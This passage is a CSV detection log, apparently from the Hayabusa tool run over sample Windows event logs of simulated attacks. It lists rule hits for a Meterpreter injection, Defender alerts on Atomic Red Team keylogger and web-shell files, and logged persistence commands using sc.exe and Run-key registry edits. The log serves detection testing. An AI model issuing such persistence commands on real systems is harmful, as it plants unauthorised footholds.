+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" 
/c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.161 +09:00,-,-,low,Quick Execution of a Series of Suspicious Commands,[condition] count() by MachineName > 5 in timeframe [result] count:21 MachineName:null timeframe:5m,rules/sigma/process_creation/win_multiple_suspicious_cli.yml,- +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : 
Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
